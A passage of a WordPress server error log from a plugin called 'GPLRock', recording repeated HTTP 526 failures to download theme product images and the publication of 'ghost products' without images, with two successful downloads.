00:23:18 UTC] GPLRock WARNING: Image download failed for product uruana-multi-store-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/uruana---multi-store-responsive-wordpress-theme-28110.webp [05-Apr-2026 00:23:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: uruana-multi-store-responsive-wordpress-theme [05-Apr-2026 00:23:18 UTC] GPLRock: Image download failed for product video-magazine-wordpress-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:20 UTC] GPLRock: Image download failed for product video-magazine-wordpress-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-magazine---wordpress-magazine-theme-17204.webp for product video-magazine-wordpress-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:23 UTC] GPLRock: Image download failed for product video-magazine-wordpress-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:25 UTC] GPLRock: Image download failed for product video-magazine-wordpress-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-magazine---wordpress-magazine-theme-17204.webp for product video-magazine-wordpress-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:27 UTC] GPLRock WARNING: Image download failed for product video-magazine-wordpress-magazine-theme. URL: https://meldwp.com/wp-content/uploads/video-magazine---wordpress-magazine-theme-17204.webp [05-Apr-2026 00:23:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-magazine-wordpress-magazine-theme [05-Apr-2026 00:23:27 UTC] GPLRock: Image download failed for product induzy-factory-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:29 UTC] GPLRock: Image download failed for product induzy-factory-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/induzy---factory--industrial-wordpress-theme-27464.webp for product induzy-factory-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:31 UTC] GPLRock: Image download failed for product induzy-factory-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:33 UTC] GPLRock: Image download failed for product induzy-factory-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/induzy---factory--industrial-wordpress-theme-27464.webp for product induzy-factory-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:35 UTC] GPLRock WARNING: Image download failed for product induzy-factory-industrial-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/induzy---factory--industrial-wordpress-theme-27464.webp [05-Apr-2026 00:23:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: induzy-factory-industrial-wordpress-theme [05-Apr-2026 00:23:36 UTC] GPLRock: Image download failed for product wordpress-sports-theme-sportak (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:38 UTC] GPLRock: Image download failed for product wordpress-sports-theme-sportak (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-sports-theme---sportak-6222.webp for product wordpress-sports-theme-sportak after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:40 UTC] GPLRock: Image download failed for product wordpress-sports-theme-sportak (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:42 UTC] GPLRock: Image download failed for product wordpress-sports-theme-sportak (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-sports-theme---sportak-6222.webp for product wordpress-sports-theme-sportak after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:44 UTC] GPLRock WARNING: Image download failed for product wordpress-sports-theme-sportak. URL: https://meldwp.com/wp-content/uploads/wordpress-sports-theme---sportak-6222.webp [05-Apr-2026 00:23:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-sports-theme-sportak [05-Apr-2026 00:23:44 UTC] GPLRock: Image download failed for product varaus-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:46 UTC] GPLRock: Image download failed for product varaus-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/varaus---hotel-booking-wordpress-theme-1554.webp for product varaus-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:48 UTC] GPLRock: Image download failed for product varaus-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:51 UTC] GPLRock: Image download failed for product varaus-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/varaus---hotel-booking-wordpress-theme-1554.webp for product varaus-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:53 UTC] GPLRock WARNING: Image download failed for product varaus-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/varaus---hotel-booking-wordpress-theme-1554.webp [05-Apr-2026 00:23:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: varaus-hotel-booking-wordpress-theme [05-Apr-2026 00:23:53 UTC] GPLRock: Image download failed for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:55 UTC] GPLRock: Image download failed for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nyssa---creative-modern-lottie-animation-multipurpose-wordpress-theme-5710.webp for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:23:57 UTC] GPLRock: Image download failed for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:23:59 UTC] GPLRock: Image download failed for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nyssa---creative-modern-lottie-animation-multipurpose-wordpress-theme-5710.webp for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:01 UTC] GPLRock WARNING: Image download failed for product nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nyssa---creative-modern-lottie-animation-multipurpose-wordpress-theme-5710.webp [05-Apr-2026 00:24:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nyssa-creative-modern-lottie-animation-multipurpose-wordpress-theme [05-Apr-2026 00:24:02 UTC] GPLRock: Image download failed for product enjoy-wordpress-magazine-and-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:04 UTC] GPLRock: Image download failed for product enjoy-wordpress-magazine-and-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enjoy---wordpress-magazine-and-blog-theme-27800.webp for product enjoy-wordpress-magazine-and-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:06 UTC] GPLRock: Image download failed for product enjoy-wordpress-magazine-and-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:08 UTC] GPLRock: Image download failed for product enjoy-wordpress-magazine-and-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enjoy---wordpress-magazine-and-blog-theme-27800.webp for product enjoy-wordpress-magazine-and-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:10 UTC] GPLRock WARNING: Image download failed for product enjoy-wordpress-magazine-and-blog-theme. URL: https://meldwp.com/wp-content/uploads/enjoy---wordpress-magazine-and-blog-theme-27800.webp [05-Apr-2026 00:24:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enjoy-wordpress-magazine-and-blog-theme [05-Apr-2026 00:24:10 UTC] GPLRock: Image download failed for product larch-responsive-minimal-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:13 UTC] GPLRock: Image download failed for product larch-responsive-minimal-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/larch---responsive-minimal-multipurpose-wordpress-theme-5570.webp for product larch-responsive-minimal-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:15 UTC] GPLRock: Image download failed for product larch-responsive-minimal-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:17 UTC] GPLRock: Image download failed for product larch-responsive-minimal-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/larch---responsive-minimal-multipurpose-wordpress-theme-5570.webp for product larch-responsive-minimal-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:19 UTC] GPLRock WARNING: Image download failed for product larch-responsive-minimal-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/larch---responsive-minimal-multipurpose-wordpress-theme-5570.webp [05-Apr-2026 00:24:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: larch-responsive-minimal-multipurpose-wordpress-theme [05-Apr-2026 00:24:19 UTC] GPLRock: Image download failed for product foodie-restaurant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:21 UTC] GPLRock: Image download failed for product foodie-restaurant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodie---restaurant-theme-25744.webp for product foodie-restaurant-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:23 UTC] GPLRock: Image download failed for product foodie-restaurant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:26 UTC] GPLRock: Image download failed for product foodie-restaurant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodie---restaurant-theme-25744.webp for product foodie-restaurant-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:28 UTC] GPLRock WARNING: Image download failed for product foodie-restaurant-theme. URL: https://meldwp.com/wp-content/uploads/foodie---restaurant-theme-25744.webp [05-Apr-2026 00:24:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodie-restaurant-theme [05-Apr-2026 00:24:28 UTC] GPLRock: Image download failed for product blxo-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:30 UTC] GPLRock: Image download failed for product blxo-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blxo---construction-wordpress-theme-7988.webp for product blxo-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:32 UTC] GPLRock: Image download failed for product blxo-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:34 UTC] GPLRock: Image download failed for product blxo-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blxo---construction-wordpress-theme-7988.webp for product blxo-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:36 UTC] GPLRock WARNING: Image download failed for product blxo-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blxo---construction-wordpress-theme-7988.webp [05-Apr-2026 00:24:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blxo-construction-wordpress-theme [05-Apr-2026 00:24:54 UTC] GPLRock: Image download failed for product geoport-transport-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:56 UTC] GPLRock: Image download failed for product geoport-transport-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:24:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/geoport---transport--logistics-wordpress-theme-4432.webp for product geoport-transport-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:24:59 UTC] GPLRock: Image download failed for product geoport-transport-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:25:01 UTC] GPLRock: Image download failed for product geoport-transport-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:25:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/geoport---transport--logistics-wordpress-theme-4432.webp for product geoport-transport-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:25:03 UTC] GPLRock WARNING: Image download failed for product geoport-transport-logistics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/geoport---transport--logistics-wordpress-theme-4432.webp [05-Apr-2026 00:25:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: geoport-transport-logistics-wordpress-theme [05-Apr-2026 00:25:04 UTC] GPLRock: Image downloaded successfully for product nextex-one-page-photography-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47e8bf2e.webp [05-Apr-2026 00:25:04 UTC] GPLRock: Using pre-downloaded image for product nextex-one-page-photography-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-47e8bf2e.webp [05-Apr-2026 00:25:04 UTC] GPLRock: Ghost product published with image - Product ID: nextex-one-page-photography-wordpress-theme [05-Apr-2026 00:25:04 UTC] GPLRock: Image download failed for product ever-fondly-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:25:06 UTC] GPLRock: Image download failed for product ever-fondly-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:25:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ever-fondly---wedding-wordpress-theme-27616.webp for product ever-fondly-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:25:09 UTC] GPLRock: Image download failed for product ever-fondly-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:25:11 UTC] GPLRock: Image download failed for product ever-fondly-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:25:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ever-fondly---wedding-wordpress-theme-27616.webp for product ever-fondly-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:25:13 UTC] GPLRock WARNING: Image download failed for product ever-fondly-wedding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ever-fondly---wedding-wordpress-theme-27616.webp [05-Apr-2026 00:25:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ever-fondly-wedding-wordpress-theme [05-Apr-2026 00:25:13 UTC] GPLRock: Image download failed for product attorco-attorney-lawyers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:01 UTC] GPLRock: Image download failed for product leonard-shop-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:03 UTC] GPLRock: Image download failed for product leonard-shop-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leonard-shop---responsive-woocommerce-wordpress-theme-32649.webp for product leonard-shop-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:05 UTC] GPLRock: Image download failed for product leonard-shop-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:07 UTC] GPLRock: Image download failed for product leonard-shop-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leonard-shop---responsive-woocommerce-wordpress-theme-32649.webp for product leonard-shop-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:09 UTC] GPLRock WARNING: Image download failed for product leonard-shop-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/leonard-shop---responsive-woocommerce-wordpress-theme-32649.webp [05-Apr-2026 00:35:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: leonard-shop-responsive-woocommerce-wordpress-theme [05-Apr-2026 00:35:10 UTC] GPLRock: Image download failed for product smartly-own-wordpress-theme-for-it-professionals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:12 UTC] GPLRock: Image download failed for product smartly-own-wordpress-theme-for-it-professionals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartly-own---wordpress-theme-for-it-professionals-2616.webp for product smartly-own-wordpress-theme-for-it-professionals after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:14 UTC] GPLRock: Image download failed for product smartly-own-wordpress-theme-for-it-professionals (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:16 UTC] GPLRock: Image download failed for product smartly-own-wordpress-theme-for-it-professionals (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartly-own---wordpress-theme-for-it-professionals-2616.webp for product smartly-own-wordpress-theme-for-it-professionals after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:18 UTC] GPLRock WARNING: Image download failed for product smartly-own-wordpress-theme-for-it-professionals. URL: https://meldwp.com/wp-content/uploads/smartly-own---wordpress-theme-for-it-professionals-2616.webp [05-Apr-2026 00:35:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smartly-own-wordpress-theme-for-it-professionals [05-Apr-2026 00:35:18 UTC] GPLRock: Image download failed for product valenti-wordpress-hd-review-magazine-news-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:20 UTC] GPLRock: Image download failed for product valenti-wordpress-hd-review-magazine-news-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valenti---wordpress-hd-review-magazine-news-theme-18118.webp for product valenti-wordpress-hd-review-magazine-news-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:23 UTC] GPLRock: Image download failed for product valenti-wordpress-hd-review-magazine-news-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:25 UTC] GPLRock: Image download failed for product valenti-wordpress-hd-review-magazine-news-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valenti---wordpress-hd-review-magazine-news-theme-18118.webp for product valenti-wordpress-hd-review-magazine-news-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:27 UTC] GPLRock WARNING: Image download failed for product valenti-wordpress-hd-review-magazine-news-theme. URL: https://meldwp.com/wp-content/uploads/valenti---wordpress-hd-review-magazine-news-theme-18118.webp [05-Apr-2026 00:35:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: valenti-wordpress-hd-review-magazine-news-theme [05-Apr-2026 00:35:27 UTC] GPLRock: Image download failed for product munich-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:29 UTC] GPLRock: Image download failed for product munich-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/munich---creative-portfolio-wordpress-theme-12429.webp for product munich-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:31 UTC] GPLRock: Image download failed for product munich-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:33 UTC] GPLRock: Image download failed for product munich-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/munich---creative-portfolio-wordpress-theme-12429.webp for product munich-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:35 UTC] GPLRock WARNING: Image download failed for product munich-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/munich---creative-portfolio-wordpress-theme-12429.webp [05-Apr-2026 00:35:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: munich-creative-portfolio-wordpress-theme [05-Apr-2026 00:35:36 UTC] GPLRock: Image download failed for product organics-agriculture-food-farm-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:38 UTC] GPLRock: Image download failed for product organics-agriculture-food-farm-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organics---agriculture--food-farm-wordpress-theme-21921.webp for product organics-agriculture-food-farm-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:40 UTC] GPLRock: Image download failed for product organics-agriculture-food-farm-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:42 UTC] GPLRock: Image download failed for product organics-agriculture-food-farm-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organics---agriculture--food-farm-wordpress-theme-21921.webp for product organics-agriculture-food-farm-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:44 UTC] GPLRock WARNING: Image download failed for product organics-agriculture-food-farm-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/organics---agriculture--food-farm-wordpress-theme-21921.webp [05-Apr-2026 00:35:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organics-agriculture-food-farm-wordpress-theme [05-Apr-2026 00:35:44 UTC] GPLRock: Image download failed for product petcio-pet-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:47 UTC] GPLRock: Image download failed for product petcio-pet-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petcio--pet-store-woocommerce-wordpress-theme-2252.webp for product petcio-pet-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:49 UTC] GPLRock: Image download failed for product petcio-pet-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:51 UTC] GPLRock: Image download failed for product petcio-pet-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/petcio--pet-store-woocommerce-wordpress-theme-2252.webp for product petcio-pet-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:53 UTC] GPLRock WARNING: Image download failed for product petcio-pet-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/petcio--pet-store-woocommerce-wordpress-theme-2252.webp [05-Apr-2026 00:35:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: petcio-pet-store-woocommerce-wordpress-theme [05-Apr-2026 00:35:53 UTC] GPLRock: Image download failed for product molla-multi-purpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:55 UTC] GPLRock: Image download failed for product molla-multi-purpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:35:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/molla--multi-purpose-woocommerce-theme-25412.webp for product molla-multi-purpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:35:57 UTC] GPLRock: Image download failed for product molla-multi-purpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:00 UTC] GPLRock: Image download failed for product molla-multi-purpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/molla--multi-purpose-woocommerce-theme-25412.webp for product molla-multi-purpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:36:02 UTC] GPLRock WARNING: Image download failed for product molla-multi-purpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/molla--multi-purpose-woocommerce-theme-25412.webp [05-Apr-2026 00:36:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: molla-multi-purpose-woocommerce-theme [05-Apr-2026 00:36:02 UTC] GPLRock: Image download failed for product tunepain-auto-parts-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:04 UTC] GPLRock: Image download failed for product tunepain-auto-parts-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tunepain--auto-parts-woocommerce-wordpress-theme-4008.webp for product tunepain-auto-parts-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:36:07 UTC] GPLRock: Image download failed for product tunepain-auto-parts-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:09 UTC] GPLRock: Image download failed for product tunepain-auto-parts-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tunepain--auto-parts-woocommerce-wordpress-theme-4008.webp for product tunepain-auto-parts-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:36:11 UTC] GPLRock WARNING: Image download failed for product tunepain-auto-parts-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tunepain--auto-parts-woocommerce-wordpress-theme-4008.webp [05-Apr-2026 00:36:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tunepain-auto-parts-woocommerce-wordpress-theme [05-Apr-2026 00:36:11 UTC] GPLRock: Image downloaded successfully for product tijuana-marijuana-dispensary-medical-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2018f8bb.webp [05-Apr-2026 00:36:11 UTC] GPLRock: Using pre-downloaded image for product tijuana-marijuana-dispensary-medical-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2018f8bb.webp [05-Apr-2026 00:36:11 UTC] GPLRock: Ghost product published with image - Product ID: tijuana-marijuana-dispensary-medical-wordpress-theme [05-Apr-2026 00:36:11 UTC] GPLRock: Image download failed for product uaques-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:13 UTC] GPLRock: Image download failed for product uaques-drinking-water-delivery-wordpress-theme 